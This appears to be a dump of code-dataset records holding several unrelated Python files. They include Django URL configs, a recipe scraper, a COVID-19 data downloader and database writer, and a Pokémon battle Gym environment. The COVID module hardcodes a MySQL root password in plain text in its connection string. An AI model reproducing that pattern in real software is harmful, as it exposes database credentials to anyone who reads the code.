autoencoder = reduction.load_autoencoder(name)\n return autoencoder\n\n\ndef format_frame_vector(frame):\n \"\"\"Format a frame vector into a matrix so it can be displayed.\"\"\"\n return np.reshape(frame, (26, 149))\n\n\nsave_autoencoder = reduction.save_autoencoder\n","sub_path":"dino/game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":3050,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"425992384","text":"# -*- coding: utf-8 -*-\n'''\n@Time : 2017/5/2 17:20\n\n@author: song\n'''\nimport pandas as pd\nimport time\nexcel_data=pd.read_table('D:/2015seeds.csv',sep=',')\n\ndef exp01(data1):\n '''\n 对单条数据进行展开\n \n :param data1: eg:['island11','A','T1',15,81]\n :return: 展开结果 eg : [island11, A, T1 ,1]\n '''\n tl1=list(data1[0:3])\n tl2 = list(data1[0:3])\n\n ##展开为0的项,如果数量为零返回空列表\n if data1[3] !=0:\n\n tl1.append('1')\n list1=[tl1]*data1[3]\n # print list1\n else:\n list1=[]\n ##展开为1的项,如果数量为零返回空列表\n if data1[4] !=0:\n tl2.append('0')\n list2 = [tl2] * data1[4]\n # print list2\n else:\n list2=[]\n ## 合并0和1列表\n flist=list1+list2\n return flist\n\ndef trans01(data):\n '''\n 对每一行数据展开\n \n :param data: excel原数据\n :return: excel展开结果\n '''\n tlist=[]\n for i in data.values:\n # print i\n tlist+=exp01(i)\n\n ##先生成列表,再将列表转化为数据框\n fDF=pd.DataFrame(tlist)\n return fDF\n\n\nxx= trans01(excel_data)\n# print xx\n# print xx[xx[2]=='T1']\n\nxx.to_csv('D:/2015seedsexp.csv')\n\n\n","sub_path":"othersthings/doexcel.py","file_name":"doexcel.py","file_ext":"py","file_size_in_byte":1228,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"598058095","text":"#!/usr/bin/env python\nimport shutil\nfrom os import path\nimport sys\nimport csv\n\nimport yaml\n\nFILES = ('ships.csv',)\n\ndef build_navalbattles(src, dst):\n filename = path.join(src, \"rawdata\", \"ships\", \"ships_in_battles.yaml\")\n with open(filename, \"r\") as f:\n data = yaml.load(f)\n battles = []\n for battle in data:\n confederate_ships = len(battle['Confederate'])\n us_ships = len(battle['US'])\n us_fortifications = 'US' in battle['fortifications']\n confederate_fortifications = 'Confederate' in battle['fortifications']\n btl = {'cwsac_id': battle['cwsac_id'],\n 'confederate_ships': confederate_ships,\n 'us_ships': us_ships,\n 'confederate_fortifications': confederate_fortifications,\n 'us_fortifications': confederate_fortifications}\n battles.append(btl)\n dstfile = path.join(dst, 'navalbattles.csv')\n with open(dstfile, 'w') as f:\n print(\"Writing: %s\" % dstfile)\n fieldnames = ('cwsac_id',\n 'confederate_ships',\n 'us_ships',\n 'confederate_fortifications',\n 'us_fortifications')\n writer = csv.DictWriter(f, fieldnames)\n writer.writeheader()\n writer.writerows(battles)\n\n\ndef build_ships_in_battles(src, dst):\n filename = path.join(src, \"rawdata\", \"ships\", \"ships_in_battles.yaml\")\n with open(filename, \"r\") as f:\n data = yaml.load(f)\n ships = []\n for battle in data:\n for belligerent in ('Confederate', 'US'):\n try:\n for ship in battle[belligerent]:\n ships.append({'cwsac_id': battle['cwsac_id'],\n 'belligerent': belligerent,\n 'ship': ship})\n except KeyError:\n pass\n dstfile = path.join(dst, 'ships_in_battles.csv')\n with open(dstfile, 'w') as f:\n print(\"Writing: %s\" % dstfile)\n fieldnames = ('cwsac_id', 'belligerent', 'ship')\n writer = csv.DictWriter(f, fieldnames)\n writer.writeheader()\n writer.writerows(ships)\n\ndef copyfiles(src, dst):\n for fn in FILES:\n srcfile = path.join(src, \"rawdata\", \"ships\", fn)\n dstfile = path.join(dst, fn)\n print(\"Writing: %s\" % dstfile)\n shutil.copy(srcfile, dstfile)\n\ndef main():\n src = sys.argv[1]\n dst = sys.argv[2]\n print(\"Building ships data\")\n copyfiles(src, dst)\n build_ships_in_battles(src, dst)\n build_navalbattles(src, dst)\n\nif __name__ == '__main__':\n main()\n","sub_path":"bin/build_ships.py","file_name":"build_ships.py","file_ext":"py","file_size_in_byte":2595,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"225332704","text":"from django.conf.urls import url\nfrom . import views\n\napp_name='devices'\n\nurlpatterns = [\n #/devices/ ---homepage\n url(r'^$', views.index,name='index'),\n #/devices/home/\n url(r'^home/$',views.home,name='home'),\n #/devices/aboutus/\n url(r'^about_us/$',views.about_us,name='about_us'),\n #/devices/retpolicy/\n url(r'^retpolicy/$',views.returnpolicy,name='returnpolicy'),\n\n #/devices/support/\nurl(r'^support/$',views.support,name='support'),\n\n#/devices/credits/\nurl(r'^credit/$',views.credit,name='credit'),\n #/devices/homeres/\n url(r'^homeres/$',views.homeres,name='homeres'),\n #/devices/map/\n url(r'^map/$',views.mymap,name='mymap'),\n #/devices/mail/\n url(r'^mail/$',views.mailsend,name='mailsend'),\n\n #/devices/register/\n url(r'^register/$',views.register,name='register'),\n #/devices/update/\n url(r'^update/$',views.update,name='update'),\n\n #/devices/delitem/\n url(r'^delitem1/$',views.delete1,name='delete1'),\n #/devices/delitem/\n url(r'^delitem2/$',views.delete2,name='delete2'),\n #/devices/delitem/\n url(r'^delitem3/$',views.delete3,name='delete3'),\n\n #/devices/addressreg/\n url(r'^addressreg/$',views.addressreg,name='addressreg'),\n #/devices/login_user/\n url(r'^login_user/$',views.login_user,name='login_user'),\n #/devices/logout_user/\n url(r'^logout_user/$',views.logout_user,name='logout_user'),\n\n #/devices/oneplus/\n url(r'^oneplus/$',views.liop,name='liop'),\n #/devices/oneplus/1/\n url(r'^oneplus/(?P[0-9]+)/$',views.opde,name='opde'),\n #/devices/oneplus/1/buy/\n url(r'^oneplus/(?P[0-9]+)/buy/$',views.opbuy,name='opbuy'),\n #devices/outofstock/compname/modelname/\n url(r'^outofstock/(?P[A-Za-z0-9 ]+)/(?P[A-Za-z0-9 ]+)/$',views.outofstock,name='outofstock'),\n #devices/placeorder/comp_name/model_name/\n url(r'^placeorder/(?P[A-Za-z0-9 ]+)/(?P[A-Za-z0-9 ]+)/$',views.placeorder,name='placeorder'),\n #/devices/xiaomi/\n url(r'^xiaomi/$',views.limi,name='limi'),\n #/devices/xiaomi/1/\n url(r'^xiaomi/(?P[0-9]+)/$',views.mide,name='mide'),\n #/devices/xiaomi/1/buy/\n url(r'^xiaomi/(?P[0-9]+)/buy/$',views.mibuy,name='mibuy'),\n\n #/devices/samsung/\n url(r'^samsung/$',views.liss,name='liss'),\n #/devices/samsung/1/\n url(r'^samsung/(?P[0-9]+)/$',views.ssde,name='ssde'),\n #/devices/samsung/1/buy/\n url(r'^samsung/(?P[0-9]+)/buy/$',views.ssbuy,name='ssbuy'),\n\n #/devices/leonovo/\n url(r'^lenovo/$',views.lilen,name='lilen'),\n #/devices/lenovo/1/\n url(r'^lenovo/(?P[0-9]+)/$',views.lende,name='lende'),\n #/devices/lenovo/1/buy/\n url(r'^lenovo/(?P[0-9]+)/buy/$',views.lenbuy,name='lenbuy'),\n\n #/devices/google/\n url(r'^google/$',views.ligo,name='ligo'),\n #/devices/google/1/\n url(r'^google/(?P[0-9]+)/$',views.gode,name='gode'),\n #/devices/google/1/buy/\n url(r'^google/(?P[0-9]+)/buy/$',views.gobuy,name='gobuy'),\n\n #/devices/sony/\n url(r'^sony/$',views.lison,name='lison'),\n #/devices/sony/1/\n url(r'^sony/(?P[0-9]+)/$',views.sonde,name='sonde'),\n #/devices/sony/1/buy/\n url(r'^sony/(?P[0-9]+)/buy/$',views.sonbuy,name='sonbuy'),\n\n\n #/devices/apple/\n url(r'^apple/$',views.liap,name='liap'),\n #/devices/apple/1/\n url(r'^apple/(?P[0-9]+)/$',views.apde,name='apde'),\n #/devices/apple/1/buy/\n url(r'^apple/(?P[0-9]+)/buy/$',views.apbuy,name='apbuy'),\n\n #/devices/moto/\n url(r'^moto/$',views.limo,name='limo'),\n #/devices/moto/1/\n url(r'^moto/(?P[0-9]+)/$',views.mode,name='mode'),\n #/devices/moto/1/buy/\n url(r'^moto/(?P[0-9]+)/buy/$',views.mobuy,name='mobuy'),\n\n #/devices/lg/\n url(r'^lg/$',views.lilg,name='lilg'),\n #/devices/lg/1/\n url(r'^lg/(?P[0-9]+)/$',views.lgde,name='lgde'),\n #/devices/lg/1/buy/\n url(r'^lg/(?P[0-9]+)/buy/$',views.lgbuy,name='lgbuy'),\n\n\n#/devices/asus/\nurl(r'^asus/$',views.lias,name='lias'),\n#/devices/asus/1/\nurl(r'^asus/(?P[0-9]+)/$',views.asde,name='asde'),\n #/devices/asus/1/buy/\n url(r'^asus/(?P[0-9]+)/buy/$',views.asbuy,name='asbuy'),\n\n #/devices/cartdetails/\n url(r'^cartdetails/$',views.cartdetails,name='cartdetails'),\n #/music/712/----712-(album_id)\n url(r'^(?P[0-9]+)/$',views.detail,name='detail'),\n\n #/music/')\n\toutput.append(':')\n\tfor x in soup.find_all('div', {'class': \"field-name-field-skladniki\"}):\n\t\tfor y in x.find_all('li'):\n\t\t\toutput.append(y.text.strip())\n\n\toutput.append('')\n\tfor x in soup.find_all('div', {'class': \"field-name-field-przygotowanie\"}):\n\t\tfor y in x.find_all('li'):\n\t\t\toutput.append(y.text.strip())\n\n\toutput.append('')\n\treturn output\n\ndef dump_array(array, file):\n\twith open(file, \"a\") as text_file:\n\t\tfor line in array:\n\t\t\tprint(line, file=text_file)\n\n\nif __name__ == '__main__':\n\tfor index, href in enumerate(get_all_links()):\n\t\tprint ('{} {}'.format(index, href))\n\t\tdump_array(scrap(href), 'input.txt')\n\n\n","sub_path":"scrapers/kwestiasmaku/run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":1441,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"479870981","text":"from django.urls import path\nfrom .views import *\n\nurlpatterns = [\n path('', Home),\n path('blog/', Blog),\n path('blog/input/', inputblog, name='inputblog'),\n path('mentor/', mentor),\n path('mentor/input/', inputmentor, name='inputmentor'),\n path('mentee/', mentee),\n path('mentee/input/', inputmentee, name='inputmentee'),\n path('author/', Author),\n\n]","sub_path":"Home/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":375,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"535049420","text":"N, M = map(int, input().split())\n\ncase = [i for i in range(1, N+1)]\ndisk = []\nfor _ in range(M):\n disk.append(int(input()))\n\nnow = 0\nfor d in disk:\n if d == now:\n continue\n i = case.index(d)\n tmp = case[i]\n case[i] = now\n now = tmp\n\nfor c in case:\n print(c)\n","sub_path":"ARC_B/ARC007_B.py","file_name":"ARC007_B.py","file_ext":"py","file_size_in_byte":286,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"387774489","text":"#Module to download data files containing COVID19 data, cleaning and\r\n#organising data and writing cleaned data to a database file.\r\n\r\n#This module(when executed) also replaces the downloaded files with new file from net\r\n#which are older than 2 days\r\n\r\n#Part of Project: COVID19 Statstics\\Visualisation\r\n\r\n\r\n#https://covid19.who.int/WHO-COVID-19-global-data.csv\r\n#https://covid.ourworldindata.org/data/owid-covid-data.csv\r\n#https://api.covid19india.org/data.json\r\n#https://api.covid19india.org/states_daily.json\r\n\r\nimport requests\r\nfrom datetime import *\r\nfrom pathlib import Path\r\nimport os\r\nimport platform\r\nimport pickle\r\nimport pandas as pd\r\nimport numpy as np\r\nimport json\r\nimport matplotlib.pyplot as plt\r\nfrom sqlalchemy import create_engine\r\nimport traceback\r\n\r\n#Setting pandas options for debugging\\output to shell \r\npd.set_option('display.max_columns', None)\r\npd.set_option('display.max_rows', None)\r\n\r\n#List of file names downloaded from internet and used for making\r\n#pandas DataFrame objects\r\nfiles = [\r\n 'covid19_global_data.csv',\r\n 'states_daily.json',\r\n 'states_total.json'\r\n ]\r\n\r\n#List of download urls\r\nurls = [\r\n 'https://covid.ourworldindata.org/data/owid-covid-data.csv',\r\n 'https://api.covid19india.org/states_daily.json',\r\n 'https://api.covid19india.org/data.json'\r\n ]\r\n\r\n#Flag to check if files are downloaded or not\r\ndownload = False\r\n\r\ndef update_covid19_database():\r\n #List of file names downloaded from internet and used for making\r\n #pandas DataFrame objects\r\n files = [\r\n 'covid19_global_data.csv',\r\n 'states_daily.json',\r\n 'states_total.json'\r\n ]\r\n\r\n #List of download urls\r\n urls = [\r\n 'https://covid.ourworldindata.org/data/owid-covid-data.csv',\r\n 'https://api.covid19india.org/states_daily.json',\r\n 'https://api.covid19india.org/data.json'\r\n ]\r\n\r\n #Flag to check if files are downloaded or not\r\n download = False\r\n\r\n for file, url in zip(files, urls):\r\n #Creating neccessary file paths and data directory\r\n my_file = Path('.\\\\data\\\\'+file)\r\n my_file.parent.mkdir(exist_ok=True)\r\n directory = '.\\\\data\\\\'\r\n\r\n\r\n #Check if file already exists\r\n if my_file.is_file():\r\n\r\n file_mtime = datetime.fromtimestamp(os.stat(my_file)[-2]) #file modify time\r\n now = datetime.now()\r\n\r\n time_elapsed = now - file_mtime\r\n\r\n #Execute this block if file does not exist or file is older than 2 days\r\n if not my_file.is_file() or now.day > file_mtime.day: #time_elapsed > timedelta(hours=23):\r\n try:\r\n response = requests.get(url)\r\n response.raise_for_status() # Check that the request was successful\r\n\r\n download = True\r\n\r\n with open(my_file, \"wb\") as f:\r\n f.write(response.content)\r\n\r\n except requests.exceptions.HTTPError:\r\n status = 'Invalid URL'\r\n last_update = file_mtime\r\n return status, last_update\r\n except requests.exceptions.ConnectionError:\r\n status = 'Unable to Connect to Internet'\r\n last_update = file_mtime\r\n return status, last_update\r\n except requests.exceptions.Timeout:\r\n status = 'Connection Timeout'\r\n last_update = file_mtime\r\n return status, last_update\r\n except requests.exceptions.RequestException:\r\n status = 'Unknown'\r\n last_update = file_mtime\r\n return status, last_update\r\n \r\n if download is False:\r\n status = 'No download'\r\n last_update = file_mtime\r\n return status, last_update\r\n\r\n if download:\r\n \r\n #Defining df containing data of all countries (Aggregate)\r\n parent_df = pd.read_csv(directory+'covid19_global_data.csv',\r\n header=0,\r\n #index_col=['location', 'date'],\r\n #nrows=70,\r\n usecols=['iso_code', 'continent', 'location',\r\n 'date', 'total_cases', 'new_cases',\r\n 'total_deaths', 'new_deaths',\r\n 'new_tests', 'total_tests',\r\n 'tests_per_case', 'positive_rate',\r\n 'population',\r\n 'population_density'],\r\n parse_dates=['date']\r\n )\r\n\r\n #Cleaning and organising parent_df\r\n i = parent_df[parent_df.location=='International'].index\r\n parent_df.drop(i, inplace=True)\r\n\r\n parent_df = parent_df.fillna(value={'total_cases':0, 'new_cases':0,\r\n 'total_deaths':0, 'new_deaths':0,\r\n 'new_tests':0, 'total_tests':0,\r\n 'tests_per_case':0, 'positive_rate':0,\r\n 'population':0, 'population_density':0,\r\n 'continent':'Global'}\r\n )\r\n\r\n parent_df = parent_df.astype(dtype={'iso_code':'string', 'continent':'string',\r\n 'location':'string', 'total_cases':'int64',\r\n 'new_cases':'int64', 'total_deaths':'int64',\r\n 'new_deaths':'int64', 'new_tests':'int64',\r\n 'total_tests':'int64',\r\n 'tests_per_case':'float64',\r\n 'positive_rate':'float64',\r\n 'population':'int64',\r\n 'population_density':'float64'}\r\n )\r\n\r\n parent_df.rename(columns={'location':'country'}, inplace=True)\r\n\r\n\r\n #Defining df containing data of all states of India (Daily)\r\n with open(directory+'states_daily.json', mode='r') as fp:\r\n dict_india = json.load(fp) \r\n\r\n india_df = pd.DataFrame(dict_india['states_daily'])\r\n india_df.drop(columns='dateymd', inplace=True)\r\n\r\n #Cleaning and organising india_df\r\n india_df = india_df.melt(id_vars=['date','status'])\r\n\r\n india_df = pd.pivot_table(india_df,values='value',\r\n index=['date','variable'],\r\n columns=['status'], aggfunc=np.sum)\r\n\r\n india_df.reset_index(inplace=True)\r\n india_df['date']= pd.to_datetime(india_df['date'])\r\n india_df.sort_values(by=['variable', 'date'], inplace=True)\r\n india_df.columns.name = None\r\n india_df.reset_index(drop=True, inplace=True)\r\n\r\n india_df.rename(columns={'variable':'state',\r\n 'Confirmed':'confirmed',\r\n 'Deceased':'deceased',\r\n 'Recovered':'recovered'},\r\n inplace=True)\r\n\r\n india_df = india_df.astype(dtype={'state':'string',\r\n 'confirmed':'int64',\r\n 'deceased':'int64',\r\n 'recovered':'int64'})\r\n\r\n #Replacing states codes in india_df with state names\r\n with open('.\\\\data\\\\state_code_dict.pickle', 'rb') as fh:\r\n state_dict = pickle.load(fh)\r\n #state_dict = code_to_dict()\r\n state_dict['tt'] = 'Total'\r\n india_df['state'].replace(to_replace=state_dict,\r\n inplace=True)\r\n\r\n india_df['total_confirmed'] = india_df.groupby('state')['confirmed'].transform(pd.Series.cumsum)\r\n india_df['total_deceased'] = india_df.groupby('state')['deceased'].transform(pd.Series.cumsum)\r\n\r\n\r\n #Defining df containing data of all states of India (Aggregate)\r\n with open(directory+'states_total.json', mode='r') as fp:\r\n dict_in_tot = json.load(fp) \r\n\r\n in_tot_df = pd.DataFrame(dict_in_tot['statewise'])\r\n\r\n #Cleaning and organising in_tot_df\r\n in_tot_df.drop(columns=['deltaconfirmed', 'deltadeaths', 'deltarecovered',\r\n 'migratedother', 'statenotes'],\r\n inplace=True)\r\n\r\n #in_tot_df.columns.tolist()\r\n cols = ['statecode', 'state', 'lastupdatedtime', 'confirmed',\r\n 'active', 'recovered', 'deaths', ] #Reordering columns\r\n in_tot_df = in_tot_df[cols]\r\n\r\n in_tot_df.drop(index=in_tot_df[in_tot_df['state']=='State Unassigned'].index,\r\n inplace=True)\r\n\r\n in_tot_df.reset_index(drop=True, inplace=True)\r\n in_tot_df['lastupdatedtime']= pd.to_datetime(in_tot_df['lastupdatedtime'],\r\n dayfirst=True)\r\n in_tot_df = in_tot_df.astype({'statecode':'string',\r\n 'state':'string',\r\n 'confirmed':'int64',\r\n 'active':'int64',\r\n 'recovered':'int64',\r\n 'deaths':'int64'})\r\n\r\n in_pop_df = pd.read_csv(r'data\\state_pop.csv', index_col=0)\r\n in_pop_df = in_pop_df.astype(dtype={'State or union territory':'string',\r\n 'Population':'int64',\r\n 'Density':'int64'})\r\n \r\n in_tot_df = in_tot_df.merge(in_pop_df, how='inner', left_on='state', right_on='State or union territory')\r\n in_tot_df = in_tot_df[['statecode', 'state', 'lastupdatedtime', 'confirmed', 'active','recovered',\r\n 'deaths', 'Population', 'Density']]\r\n in_tot_df.rename(columns={'Population':'population',\r\n 'Density':'density'},\r\n inplace=True)\r\n #print(in_tot_df)\r\n\r\n #Writing the cleaned DataFrames(3) to database file\r\n engine = create_engine(f'sqlite:///{directory}data.db', echo=False)\r\n\r\n parent_df.to_sql('global', con=engine, if_exists='replace', index_label='ID')\r\n india_df.to_sql('india_daily', con=engine, if_exists='replace', index_label='ID')\r\n in_tot_df.to_sql('india_total', con=engine, if_exists='replace', index_label='ID')\r\n\r\n mysql_engine = create_engine(\"mysql+mysqlconnector://root:mysqlluv92@localhost/covid19\")\r\n\r\n parent_df.to_sql('global', con=mysql_engine, if_exists='replace', index_label='ID', chunksize=500)\r\n india_df.to_sql('india_daily', con=mysql_engine, if_exists='replace', index_label='ID', chunksize=500)\r\n in_tot_df.to_sql('india_total', con=mysql_engine, if_exists='replace', index_label='ID', chunksize=500)\r\n\r\n status = 'Success'\r\n last_update = now\r\n return status, last_update\r\n\r\nif __name__ == '__main__':\r\n \r\n if download:\r\n print(\"Files downloaded succesfully:\")\r\n\r\n try:\r\n for file in files:\r\n print(file,\r\n datetime.fromtimestamp(os.stat(my_file)[-2]).strftime('%Y-%m-%d %H:%M:%S'))\r\n except FileNotFoundError:\r\n print('Files not found.')\r\n","sub_path":"covid19data.py","file_name":"covid19data.py","file_ext":"py","file_size_in_byte":11556,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"593116680","text":"# -*- coding: utf-8 -*-\n\"\"\"This module defines a player class exposing the Open AI Gym API.\n\"\"\"\n\nfrom abc import ABC, abstractmethod, abstractproperty\nfrom gym.core import Env # pyre-ignore\n\nfrom queue import Queue\nfrom threading import Thread\n\nfrom typing import Any, Callable, List, Optional, Tuple\n\nfrom poke_env.environment.battle import Battle\nfrom poke_env.player.player import Player\nfrom poke_env.player_configuration import PlayerConfiguration\nfrom poke_env.server_configuration import ServerConfiguration\nfrom poke_env.utils import to_id_str\n\n\nimport asyncio\nimport numpy as np # pyre-ignore\nimport time\n\n\nclass EnvPlayer(Player, Env, ABC): # pyre-ignore\n \"\"\"Player exposing the Open AI Gym Env API. Recommended use is with play_against.\n \"\"\"\n\n MAX_BATTLE_SWITCH_RETRY = 10000\n PAUSE_BETWEEN_RETRIES = 0.001\n\n def __init__(\n self,\n player_configuration: PlayerConfiguration,\n *,\n avatar: Optional[int] = None,\n battle_format: str,\n log_level: Optional[int] = None,\n server_configuration: ServerConfiguration,\n start_listening: bool = True,\n ):\n \"\"\"\n :param player_configuration: Player configuration.\n :type player_configuration: PlayerConfiguration\n :param avatar: Player avatar id. Optional.\n :type avatar: int, optional\n :param battle_format: Name of the battle format this player plays.\n :type battle_format: str\n :param log_level: The player's logger level.\n :type log_level: int. Defaults to logging's default level.\n :param server_configuration: Server configuration.\n :type server_configuration: ServerConfiguration\n :param start_listening: Wheter to start listening to the server. Defaults to\n True.\n :type start_listening: bool\n \"\"\"\n super(EnvPlayer, self).__init__(\n player_configuration=player_configuration,\n avatar=avatar,\n battle_format=battle_format,\n log_level=log_level,\n max_concurrent_battles=1,\n server_configuration=server_configuration,\n start_listening=start_listening,\n )\n self._actions = {}\n self._current_battle: Battle\n self._observations = {}\n self._reward_buffer = {}\n self._start_new_battle = False\n\n @abstractmethod\n def _action_to_move(self, action: int, battle: Battle) -> str:\n \"\"\"Abstract method converting elements of the action space to move orders.\n \"\"\"\n pass\n\n def _battle_finished_callback(self, battle: Battle) -> None:\n self._observations[battle].put(self.embed_battle(battle))\n\n def _init_battle(self, battle: Battle) -> None:\n self._observations[battle] = Queue()\n self._actions[battle] = Queue()\n\n def choose_move(self, battle: Battle) -> str:\n if battle not in self._observations or battle not in self._actions:\n self._init_battle(battle)\n self._observations[battle].put(self.embed_battle(battle))\n action = self._actions[battle].get()\n\n return self._action_to_move(action, battle)\n\n def close(self) -> None:\n \"\"\"Unimplemented. Has no effect.\"\"\"\n pass\n\n def complete_current_battle(self) -> None:\n \"\"\"Completes the current battle by performing random moves.\"\"\"\n done = self._current_battle.finished\n while not done:\n _, _, done, _ = self.step(np.random.choice(self._ACTION_SPACE))\n\n def compute_reward(self, battle: Battle) -> float:\n \"\"\"Returns a reward for the given battle.\n\n The default implementation corresponds to the default parameters of the\n reward_computing_helper method.\n\n :param battle: The battle for which to compute the reward.\n :type battle: Battle\n :return: The computed reward.\n :rtype: float\n \"\"\"\n return self.reward_computing_helper(battle)\n\n @abstractmethod\n def embed_battle(self, battle: Battle) -> Any:\n \"\"\"Abstract method for embedding battles.\n\n :param battle: The battle whose state is being embedded\n :type battle: Battle\n :return: The computed embedding\n :rtype: Any\n \"\"\"\n pass\n\n def reset(self) -> Any:\n \"\"\"Resets the internal environment state. The current battle will be set to an\n active unfinished battle.\n\n :return: The observation of the new current battle.\n :rtype: Any\n :raies: EnvironmentError\n \"\"\"\n for _ in range(self.MAX_BATTLE_SWITCH_RETRY):\n battles = dict(self._actions.items())\n battles = [b for b in battles if not b.finished]\n if battles:\n self._current_battle = battles[0]\n observation = self._observations[self._current_battle].get()\n return observation\n time.sleep(self.PAUSE_BETWEEN_RETRIES)\n else:\n raise EnvironmentError(\"User %s has no active battle.\" % self.username)\n\n def render(self, mode=\"human\") -> None:\n \"\"\"A one line rendering of the current state of the battle.\n \"\"\"\n print(\n \" Turn %4d. | [%s][%3d/%3dhp] %10.10s - %10.10s [%3d%%hp][%s]\"\n % (\n self._current_battle.turn,\n \"\".join(\n [\n \"⦻\" if mon.fainted else \"●\"\n for mon in self._current_battle.team.values()\n ]\n ),\n self._current_battle.active_pokemon.current_hp or 0,\n self._current_battle.active_pokemon.max_hp or 0,\n self._current_battle.active_pokemon.species,\n self._current_battle.opponent_active_pokemon.species,\n self._current_battle.opponent_active_pokemon.current_hp or 0,\n \"\".join(\n [\n \"⦻\" if mon.fainted else \"●\"\n for mon in self._current_battle.opponent_team.values()\n ]\n ),\n ),\n end=\"\\n\" if self._current_battle.finished else \"\\r\",\n )\n\n def reward_computing_helper(\n self,\n battle: Battle,\n *,\n fainted_value: float = 0.0,\n hp_value: float = 0.0,\n number_of_pokemons: int = 6,\n starting_value: float = 0.0,\n status_value: float = 0.0,\n victory_value: float = 1.0,\n ) -> float:\n \"\"\"A helper function to compute rewards.\n\n The reward is computed by computing the value of a game state, and by comparing\n it to the last state.\n\n State values are computed by weighting different factor. Fainted pokemons,\n their remaining HP, inflicted statuses and winning are taken into account.\n\n For instance, if the last time this function was called for battle A it had\n a state value of 8 and this call leads to a value of 9, the returned reward will\n be 9 - 8 = 1.\n\n Consider a single battle where each player has 6 pokemons. No opponent pokemon\n has fainted, but our team has one fainted pokemon. Three opposing pokemons are\n burned. We have one pokemon missing half of its HP, and our fainted pokemon has\n no HP left.\n\n The value of this state will be:\n\n - With fainted value: 1, status value: 0.5, hp value: 1:\n = - 1 (fainted) + 3 * 0.5 (status) - 1.5 (our hp) = -1\n - With fainted value: 3, status value: 0, hp value: 1:\n = - 3 + 3 * 0 - 1.5 = -4.5\n\n :param battle: The battle for which to compute rewards.\n :type battle: Battle\n :param fainted_value: The reward weight for fainted pokemons. Defaults to 0.\n :type fainted_value: float\n :param hp_value: The reward weight for hp per pokemon. Defaults to 0.\n :type hp_value: float\n :param number_of_pokemons: The number of pokemons per team. Defaults to 6.\n :type number_of_pokemons: int\n :param starting_value: The default reference value evaluation. Defaults to 0.\n :type starting_value: float\n :param status_value: The reward value per non-fainted status. Defaults to 0.\n :type status_value: float\n :param victory_value: The reward value for winning. Defaults to 1.\n :type victory_value: float\n :return: The reward.\n :rtype: float\n \"\"\"\n if battle not in self._reward_buffer:\n self._reward_buffer[battle] = starting_value\n current_value = 0\n\n for mon in battle.team.values():\n current_value += mon.current_hp_fraction * hp_value\n if mon.fainted:\n current_value -= fainted_value\n elif mon.status is not None:\n current_value -= status_value\n\n current_value += (number_of_pokemons - len(battle.team)) * hp_value\n\n for mon in battle.opponent_team.values():\n current_value -= mon.current_hp_fraction * hp_value\n if mon.fainted:\n current_value += fainted_value\n elif mon.status is not None:\n current_value += status_value\n\n current_value -= (number_of_pokemons - len(battle.opponent_team)) * hp_value\n\n if battle.won:\n current_value += victory_value\n elif battle.lost:\n current_value -= victory_value\n\n to_return = current_value - self._reward_buffer[battle]\n self._reward_buffer[battle] = current_value\n\n return to_return\n\n def seed(self, seed=None) -> None:\n \"\"\"Sets the numpy seed.\"\"\"\n np.random.seed(seed)\n\n def step(self, action: int) -> Tuple:\n \"\"\"Performs action in the current battle.\n\n :param action: The action to perform.\n :type action: int\n :return: A tuple containing the next observation, the reward, a boolean\n indicating wheter the episode is finished, and additional information\n :rtype: tuple\n \"\"\"\n self._actions[self._current_battle].put(action)\n observation = self._observations[self._current_battle].get()\n return (\n observation,\n self.compute_reward(self._current_battle),\n self._current_battle.finished,\n {},\n )\n\n def play_against(\n self, env_algorithm: Callable, opponent: Player, env_algorithm_kwargs=None\n ):\n \"\"\"Executes a function controlling the player while facing opponent.\n\n The env_algorithm function is executed with the player environment as first\n argument. It exposes the open ai gym API.\n\n Additional arguments can be passed to the env_algorithm function with\n env_algorithm_kwargs.\n\n Battles against opponent will be launched as long as env_algorithm is running.\n When env_algorithm returns, the current active battle will be finished randomly\n if it is not already.\n\n :param env_algorithm: A function that controls the player. It must accept the\n player as first argument. Additional arguments can be passed with the\n env_algorithm_kwargs argument.\n :type env_algorithm: callable\n :param opponent: A player against with the env player will player.\n :type opponent: Player\n :param env_algorithm_kwargs: Optional arguments to pass to the env_algorithm.\n Defaults to None.\n \"\"\"\n self._start_new_battle = True\n\n async def launch_battles(player: EnvPlayer, opponent: Player):\n battles_coroutine = asyncio.gather(\n player.send_challenges(\n opponent=to_id_str(opponent.username),\n n_challenges=1,\n to_wait=opponent.logged_in,\n ),\n opponent.accept_challenges(\n opponent=to_id_str(player.username), n_challenges=1\n ),\n )\n await battles_coroutine\n\n def env_algorithm_wrapper(player, kwargs):\n env_algorithm(player, **kwargs)\n\n player._start_new_battle = False\n while True:\n try:\n player.complete_current_battle()\n player.reset()\n except OSError:\n break\n\n loop = asyncio.get_event_loop()\n\n if env_algorithm_kwargs is None:\n env_algorithm_kwargs = {}\n\n thread = Thread(\n target=lambda: env_algorithm_wrapper(self, env_algorithm_kwargs)\n )\n thread.start()\n\n while self._start_new_battle:\n loop.run_until_complete(launch_battles(self, opponent))\n thread.join()\n\n @abstractproperty\n def action_space(self) -> List:\n \"\"\"Returns the action space of the player. Must be implemented by subclasses.\"\"\"\n pass\n\n\nclass Gen7EnvSinglePlayer(EnvPlayer):\n _ACTION_SPACE = list(range(3 * 4 + 6))\n\n def _action_to_move(self, action: int, battle: Battle) -> str:\n \"\"\"Converts actions to move orders.\n\n The conversion is done as follows:\n\n 0 <= action < 4:\n The actionth available move in battle.available_moves is executed.\n 4 <= action < 8:\n The action - 4th available move in battle.available_moves is executed, with\n z-move.\n 8 <= action < 12:\n The action - 8th available move in battle.available_moves is executed, with\n mega-evolution.\n 12 <= action < 18\n The action - 12th available switch in battle.available_switches is executed.\n\n If the proposed action is illegal, a random legal move is performed.\n\n :param action: The action to convert.\n :type action: int\n :param battle: The battle in which to act.\n :type battle: Battle\n :return: the order to send to the server.\n :rtype: str\n 